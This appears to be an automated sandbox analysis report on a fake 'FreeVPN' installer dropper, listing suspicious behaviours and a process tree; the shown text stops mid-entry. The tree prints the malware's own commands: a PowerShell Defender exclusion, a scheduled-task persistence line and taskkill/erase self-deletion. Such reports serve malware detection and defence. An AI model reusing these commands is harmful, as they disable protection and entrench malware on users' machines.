File opened for modification	C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\freevpn_setup_e_wvsgitrka6bd5k9a2fnlmb74.exe.4j2qsdo.partial:Zone.Identifier	browser_broker.exe

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	12	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	66	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	122	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4172	powershell.exe
4172	powershell.exe
4172	powershell.exe
4172	powershell.exe
4172	powershell.exe
4520	rundll32.exe
4520	rundll32.exe
3828	svchost.exe
3828	svchost.exe
4320	Fri15af75ee9b.exe
4320	Fri15af75ee9b.exe
5600	WerFault.exe
5600	WerFault.exe
5600	WerFault.exe
5600	WerFault.exe
5600	WerFault.exe
5600	WerFault.exe
5600	WerFault.exe
5600	WerFault.exe
5600	WerFault.exe
5600	WerFault.exe
5600	WerFault.exe
5600	WerFault.exe
5600	WerFault.exe
5600	WerFault.exe
5600	WerFault.exe
5600	WerFault.exe
5600	WerFault.exe
5600	WerFault.exe
2108	Process not Found
2108	Process not Found
5600	WerFault.exe
5600	WerFault.exe
5600	WerFault.exe
2108	Process not Found
2108	Process not Found
5600	WerFault.exe
5600	WerFault.exe
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
5608	WerFault.exe
5608	WerFault.exe
5608	WerFault.exe
5608	WerFault.exe
5608	WerFault.exe
5608	WerFault.exe
5608	WerFault.exe
5608	WerFault.exe
5608	WerFault.exe
5608	WerFault.exe
5608	WerFault.exe
5608	WerFault.exe
5608	WerFault.exe
5608	WerFault.exe
5608	WerFault.exe
5608	WerFault.exe
5608	WerFault.exe
5608	WerFault.exe
5608	WerFault.exe
5608	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2108	Process not Found

Suspicious behavior: MapViewOfSection 14 IoCs

pid	Process
4320	Fri15af75ee9b.exe
7492	uauvcwe
1612	MicrosoftEdgeCP.exe
1612	MicrosoftEdgeCP.exe
1612	MicrosoftEdgeCP.exe
1612	MicrosoftEdgeCP.exe
2356	uauvcwe
7500	MicrosoftEdgeCP.exe
7500	MicrosoftEdgeCP.exe
7500	MicrosoftEdgeCP.exe
7500	MicrosoftEdgeCP.exe
7500	MicrosoftEdgeCP.exe
7500	MicrosoftEdgeCP.exe
7776	uauvcwe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
5764	3629965.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4348	Fri1553f0ee90.exe
Token: SeDebugPrivilege	4272	Fri155442fc38b.exe
Token: SeDebugPrivilege	4172	powershell.exe
Token: SeDebugPrivilege	4764	2153740.exe
Token: SeDebugPrivilege	4388	2.exe
Token: SeDebugPrivilege	5044	PublicDwlBrowser1100.exe
Token: SeDebugPrivilege	4520	rundll32.exe
Token: SeDebugPrivilege	4520	rundll32.exe
Token: SeDebugPrivilege	3828	svchost.exe
Token: SeDebugPrivilege	4520	rundll32.exe
Token: SeDebugPrivilege	4520	rundll32.exe
Token: SeDebugPrivilege	4520	rundll32.exe
Token: SeDebugPrivilege	4520	rundll32.exe
Token: SeDebugPrivilege	4152	7432657.exe
Token: SeDebugPrivilege	4520	rundll32.exe
Token: SeDebugPrivilege	4516	BearVpn 3.exe
Token: SeDebugPrivilege	4520	rundll32.exe
Token: SeDebugPrivilege	4520	rundll32.exe
Token: SeAuditPrivilege	2396	svchost.exe
Token: SeRestorePrivilege	5608	WerFault.exe
Token: SeBackupPrivilege	5608	WerFault.exe
Token: SeDebugPrivilege	4520	rundll32.exe
Token: SeAuditPrivilege	2396	svchost.exe
Token: SeDebugPrivilege	4816	WerFault.exe
Token: SeDebugPrivilege	5600	WerFault.exe
Token: SeDebugPrivilege	4520	rundll32.exe
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeDebugPrivilege	4520	rundll32.exe
Token: SeDebugPrivilege	5608	WerFault.exe
Token: SeAssignPrimaryTokenPrivilege	2656	svchost.exe
Token: SeIncreaseQuotaPrivilege	2656	svchost.exe
Token: SeSecurityPrivilege	2656	svchost.exe
Token: SeTakeOwnershipPrivilege	2656	svchost.exe
Token: SeLoadDriverPrivilege	2656	svchost.exe
Token: SeSystemtimePrivilege	2656	svchost.exe
Token: SeBackupPrivilege	2656	svchost.exe
Token: SeRestorePrivilege	2656	svchost.exe
Token: SeShutdownPrivilege	2656	svchost.exe
Token: SeSystemEnvironmentPrivilege	2656	svchost.exe
Token: SeUndockPrivilege	2656	svchost.exe
Token: SeManageVolumePrivilege	2656	svchost.exe
Token: SeDebugPrivilege	4520	rundll32.exe
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeAuditPrivilege	2396	svchost.exe
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeDebugPrivilege	5692	5575411.exe
Token: SeAuditPrivilege	2396	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2656	svchost.exe
Token: SeIncreaseQuotaPrivilege	2656	svchost.exe
Token: SeSecurityPrivilege	2656	svchost.exe
Token: SeTakeOwnershipPrivilege	2656	svchost.exe
Token: SeLoadDriverPrivilege	2656	svchost.exe
Token: SeSystemtimePrivilege	2656	svchost.exe
Token: SeBackupPrivilege	2656	svchost.exe
Token: SeRestorePrivilege	2656	svchost.exe
Token: SeShutdownPrivilege	2656	svchost.exe
Token: SeSystemEnvironmentPrivilege	2656	svchost.exe

Suspicious use of FindShellTrayWindow 12 IoCs

pid	Process
5924	ultramediaburner.tmp
5420	setup_2.tmp
4260	installer.exe
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
6196	FreeVPN.exe
2108	Process not Found
2108	Process not Found

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
6196	FreeVPN.exe

Suspicious use of SetWindowsHookEx 21 IoCs

pid	Process
2108	Process not Found
6620	MicrosoftEdge.exe
7040	MicrosoftEdgeCP.exe
6232	cmd.exe
7040	MicrosoftEdgeCP.exe
7668	MicrosoftEdge.exe
1612	MicrosoftEdgeCP.exe
1612	MicrosoftEdgeCP.exe
4324	freevpn_setup_e_wvsgitrka6bd5k9a2fnlmb74.exe
7148	search_awesome.exe
4828	setup.exe
2292	setup.exe
2740	setup.exe
5256	FreeVPN.exe
6212	FreeVPN.exe
6196	FreeVPN.exe
6196	FreeVPN.exe
6196	FreeVPN.exe
7348	MicrosoftEdge.exe
7500	MicrosoftEdgeCP.exe
7500	MicrosoftEdgeCP.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
2108	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3976 wrote to memory of 3476	3976	setup_x86_x64_install.exe	82
PID 3976 wrote to memory of 3476	3976	setup_x86_x64_install.exe	82
PID 3976 wrote to memory of 3476	3976	setup_x86_x64_install.exe	82
PID 3476 wrote to memory of 4084	3476	setup_installer.exe	83
PID 3476 wrote to memory of 4084	3476	setup_installer.exe	83
PID 3476 wrote to memory of 4084	3476	setup_installer.exe	83
PID 4084 wrote to memory of 3620	4084	setup_install.exe	86
PID 4084 wrote to memory of 3620	4084	setup_install.exe	86
PID 4084 wrote to memory of 3620	4084	setup_install.exe	86
PID 4084 wrote to memory of 2064	4084	setup_install.exe	87
PID 4084 wrote to memory of 2064	4084	setup_install.exe	87
PID 4084 wrote to memory of 2064	4084	setup_install.exe	87
PID 4084 wrote to memory of 3976	4084	setup_install.exe	96
PID 4084 wrote to memory of 3976	4084	setup_install.exe	96
PID 4084 wrote to memory of 3976	4084	setup_install.exe	96
PID 4084 wrote to memory of 3852	4084	setup_install.exe	88
PID 4084 wrote to memory of 3852	4084	setup_install.exe	88
PID 4084 wrote to memory of 3852	4084	setup_install.exe	88
PID 4084 wrote to memory of 3436	4084	setup_install.exe	95
PID 4084 wrote to memory of 3436	4084	setup_install.exe	95
PID 4084 wrote to memory of 3436	4084	setup_install.exe	95
PID 4084 wrote to memory of 4116	4084	setup_install.exe	89
PID 4084 wrote to memory of 4116	4084	setup_install.exe	89
PID 4084 wrote to memory of 4116	4084	setup_install.exe	89
PID 4084 wrote to memory of 4136	4084	setup_install.exe	92
PID 4084 wrote to memory of 4136	4084	setup_install.exe	92
PID 4084 wrote to memory of 4136	4084	setup_install.exe	92
PID 4084 wrote to memory of 4152	4084	setup_install.exe	90
PID 4084 wrote to memory of 4152	4084	setup_install.exe	90
PID 4084 wrote to memory of 4152	4084	setup_install.exe	90
PID 3976 wrote to memory of 4188	3976	cmd.exe	94
PID 3976 wrote to memory of 4188	3976	cmd.exe	94
PID 3976 wrote to memory of 4188	3976	cmd.exe	94
PID 2064 wrote to memory of 4196	2064	cmd.exe	93
PID 2064 wrote to memory of 4196	2064	cmd.exe	93
PID 2064 wrote to memory of 4196	2064	cmd.exe	93
PID 3852 wrote to memory of 4228	3852	cmd.exe	97
PID 3852 wrote to memory of 4228	3852	cmd.exe	97
PID 3852 wrote to memory of 4228	3852	cmd.exe	97
PID 3436 wrote to memory of 4272	3436	cmd.exe	98
PID 3436 wrote to memory of 4272	3436	cmd.exe	98
PID 4116 wrote to memory of 4320	4116	cmd.exe	99
PID 4116 wrote to memory of 4320	4116	cmd.exe	99
PID 4116 wrote to memory of 4320	4116	cmd.exe	99
PID 4152 wrote to memory of 4348	4152	7432657.exe	100
PID 4152 wrote to memory of 4348	4152	7432657.exe	100
PID 4228 wrote to memory of 4376	4228	Fri157e25afd971.exe	101
PID 4228 wrote to memory of 4376	4228	Fri157e25afd971.exe	101
PID 4228 wrote to memory of 4376	4228	Fri157e25afd971.exe	101
PID 4348 wrote to memory of 4700	4348	Fri1553f0ee90.exe	102
PID 4348 wrote to memory of 4700	4348	Fri1553f0ee90.exe	102
PID 4348 wrote to memory of 4700	4348	Fri1553f0ee90.exe	102
PID 4272 wrote to memory of 4764	4272	Fri155442fc38b.exe	103
PID 4272 wrote to memory of 4764	4272	Fri155442fc38b.exe	103
PID 4376 wrote to memory of 4816	4376	Fri157e25afd971.tmp	160
PID 4376 wrote to memory of 4816	4376	Fri157e25afd971.tmp	160
PID 4272 wrote to memory of 4836	4272	Fri155442fc38b.exe	122
PID 4272 wrote to memory of 4836	4272	Fri155442fc38b.exe	122
PID 4272 wrote to memory of 4836	4272	Fri155442fc38b.exe	122
PID 4700 wrote to memory of 4936	4700	LzmwAqmV.exe	108
PID 4700 wrote to memory of 4936	4700	LzmwAqmV.exe	108
PID 4272 wrote to memory of 4944	4272	Fri155442fc38b.exe	105
PID 4272 wrote to memory of 4944	4272	Fri155442fc38b.exe	105
PID 4272 wrote to memory of 4944	4272	Fri155442fc38b.exe	105

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1228

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2664

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2656

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2612

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2396

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2388

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1880

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1400

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1324

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1100

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:988
- C:\Users\Admin\AppData\Roaming\uauvcwe
  C:\Users\Admin\AppData\Roaming\uauvcwe
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:7492
- C:\Users\Admin\AppData\Roaming\uauvcwe
  C:\Users\Admin\AppData\Roaming\uauvcwe
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:2356
- C:\Users\Admin\AppData\Roaming\uauvcwe
  C:\Users\Admin\AppData\Roaming\uauvcwe
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:7776

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:68

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3976
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3476
- - C:\Users\Admin\AppData\Local\Temp\7zS49DD18D3\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS49DD18D3\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4084
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      PID:3620
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4172
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri1544861ac3fe6a.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2064
    - - C:\Users\Admin\AppData\Local\Temp\7zS49DD18D3\Fri1544861ac3fe6a.exe
        
        Fri1544861ac3fe6a.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4196
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 764
        6⤵
        Program crash
        
        PID:5608
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 796
        6⤵
        Program crash
        
        PID:4808
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 820
        6⤵
        Program crash
        
        PID:5936
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 828
        6⤵
        Program crash
        
        PID:5728
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 960
        6⤵
        Program crash
        
        PID:5752
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 996
        6⤵
        Program crash
        
        PID:5536
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 1052
        6⤵
        Program crash
        
        PID:2228
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 1368
        6⤵
        Program crash
        
        PID:4924
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 1344
        6⤵
        Program crash
        
        PID:6064
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 1628
        6⤵
        Program crash
        
        PID:6296
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 1704
        6⤵
        Program crash
        
        PID:6560
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 1660
        6⤵
        Program crash
        
        PID:7048
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 1784
        6⤵
        Program crash
        
        PID:7868
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri157e25afd971.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3852
    - - C:\Users\Admin\AppData\Local\Temp\7zS49DD18D3\Fri157e25afd971.exe
        
        Fri157e25afd971.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4228
      - C:\Users\Admin\AppData\Local\Temp\is-V1NN5.tmp\Fri157e25afd971.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-V1NN5.tmp\Fri157e25afd971.tmp" /SL5="$5005E,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS49DD18D3\Fri157e25afd971.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:4376
        
        C:\Users\Admin\AppData\Local\Temp\is-NTLTJ.tmp\zab2our.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-NTLTJ.tmp\zab2our.exe" /S /UID=burnerch2
        7⤵
        
        PID:4816
        
        C:\Program Files\Windows Security\AUEASNLEDT\ultramediaburner.exe
        
        "C:\Program Files\Windows Security\AUEASNLEDT\ultramediaburner.exe" /VERYSILENT
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4308
        
        C:\Users\Admin\AppData\Local\Temp\is-J31GL.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-J31GL.tmp\ultramediaburner.tmp" /SL5="$102CC,281924,62464,C:\Program Files\Windows Security\AUEASNLEDT\ultramediaburner.exe" /VERYSILENT
        9⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:5924
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        10⤵
        Executes dropped EXE
        
        PID:4912
        
        C:\Users\Admin\AppData\Local\Temp\54-572ba-2ed-62aba-7e87b11d14f25\Tyvagaelora.exe
        
        "C:\Users\Admin\AppData\Local\Temp\54-572ba-2ed-62aba-7e87b11d14f25\Tyvagaelora.exe"
        8⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:4372
        
        C:\Users\Admin\AppData\Local\Temp\8a-f9dc3-1ff-611ad-82fc05b9b82c3\Linyhashaeli.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8a-f9dc3-1ff-611ad-82fc05b9b82c3\Linyhashaeli.exe"
        8⤵
        Executes dropped EXE
        
        PID:5788
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sij23gca.lev\GcleanerEU.exe /eufive & exit
        9⤵
        
        PID:6484
        
        C:\Users\Admin\AppData\Local\Temp\sij23gca.lev\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\sij23gca.lev\GcleanerEU.exe /eufive
        10⤵
        Executes dropped EXE
        
        PID:6504
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6504 -s 648
        11⤵
        Program crash
        
        PID:7336
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6504 -s 664
        11⤵
        Program crash
        
        PID:7528
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6504 -s 764
        11⤵
        Program crash
        
        PID:7672
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6504 -s 812
        11⤵
        Program crash
        
        PID:7772
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6504 -s 920
        11⤵
        Program crash
        
        PID:7596
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6504 -s 1172
        11⤵
        Program crash
        
        PID:4504
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6504 -s 1184
        11⤵
        Program crash
        
        PID:7992
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\sij23gca.lev\GcleanerEU.exe" & exit
        11⤵
        
        PID:8080
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "GcleanerEU.exe" /f
        12⤵
        Kills process with taskkill
        
        PID:4344
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\evxmximr.d0w\installer.exe /qn CAMPAIGN="654" & exit
        9⤵
        
        PID:6756
        
        C:\Users\Admin\AppData\Local\Temp\evxmximr.d0w\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\evxmximr.d0w\installer.exe /qn CAMPAIGN="654"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Modifies system certificate store
        Suspicious use of FindShellTrayWindow
        
        PID:4260
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\evxmximr.d0w\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\evxmximr.d0w\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630643780 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        11⤵
        
        PID:7576
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o2z1brbp.ooc\anyname.exe & exit
        9⤵
        
        PID:3832
        
        C:\Users\Admin\AppData\Local\Temp\o2z1brbp.ooc\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\o2z1brbp.ooc\anyname.exe
        10⤵
        Executes dropped EXE
        
        PID:5472
        
        C:\Users\Admin\AppData\Local\Temp\o2z1brbp.ooc\anyname.exe
        
        "C:\Users\Admin\AppData\Local\Temp\o2z1brbp.ooc\anyname.exe" -u
        11⤵
        Executes dropped EXE
        
        PID:7076
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ybiu5mgb.fjr\gcleaner.exe /mixfive & exit
        9⤵
        
        PID:6748
        
        C:\Users\Admin\AppData\Local\Temp\ybiu5mgb.fjr\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\ybiu5mgb.fjr\gcleaner.exe /mixfive
        10⤵
        Executes dropped EXE
        
        PID:7156
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7156 -s 648
        11⤵
        Program crash
        
        PID:7932
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7156 -s 664
        11⤵
        Program crash
        
        PID:7984
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7156 -s 668
        11⤵
        Program crash
        
        PID:8024
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7156 -s 748
        11⤵
        Program crash
        
        PID:8072
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7156 -s 880
        11⤵
        Program crash
        
        PID:8184
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7156 -s 928
        11⤵
        Program crash
        
        PID:4212
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7156 -s 1176
        11⤵
        Program crash
        
        PID:8164
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7156 -s 1244
        11⤵
        Program crash
        
        PID:7332
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ybiu5mgb.fjr\gcleaner.exe" & exit
        11⤵
        
        PID:772
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "gcleaner.exe" /f
        12⤵
        Kills process with taskkill
        
        PID:4668
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ofty5avj.geh\autosubplayer.exe /S & exit
        9⤵
        Suspicious use of SetWindowsHookEx
        
        PID:6232
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri15af75ee9b.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4116
    - - C:\Users\Admin\AppData\Local\Temp\7zS49DD18D3\Fri15af75ee9b.exe
        
        Fri15af75ee9b.exe
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:4320
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri1553f0ee90.exe
      4⤵
      PID:4152
    - - C:\Users\Admin\AppData\Local\Temp\7zS49DD18D3\Fri1553f0ee90.exe
        
        Fri1553f0ee90.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4348
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4700
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5044
        
        C:\Users\Admin\AppData\Roaming\5575411.exe
        
        "C:\Users\Admin\AppData\Roaming\5575411.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5692
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5692 -s 1992
        9⤵
        Program crash
        
        PID:6684
        
        C:\Users\Admin\AppData\Roaming\3629965.exe
        
        "C:\Users\Admin\AppData\Roaming\3629965.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: SetClipboardViewer
        
        PID:5764
        
        C:\Users\Admin\AppData\Roaming\1318013.exe
        
        "C:\Users\Admin\AppData\Roaming\1318013.exe"
        8⤵
        Executes dropped EXE
        
        PID:5872
        
        C:\Users\Admin\AppData\Roaming\3665333.exe
        
        "C:\Users\Admin\AppData\Roaming\3665333.exe"
        8⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4552
        
        C:\Users\Admin\AppData\Roaming\5087658.exe
        
        "C:\Users\Admin\AppData\Roaming\5087658.exe"
        8⤵
        Executes dropped EXE
        
        PID:440
        
        C:\Users\Admin\AppData\Roaming\1187813.exe
        
        "C:\Users\Admin\AppData\Roaming\1187813.exe"
        8⤵
        Executes dropped EXE
        
        PID:5632
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        Executes dropped EXE
        
        PID:4936
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:3080
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:5760
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:6440
        
        C:\Windows\System32\cmd.exe
        
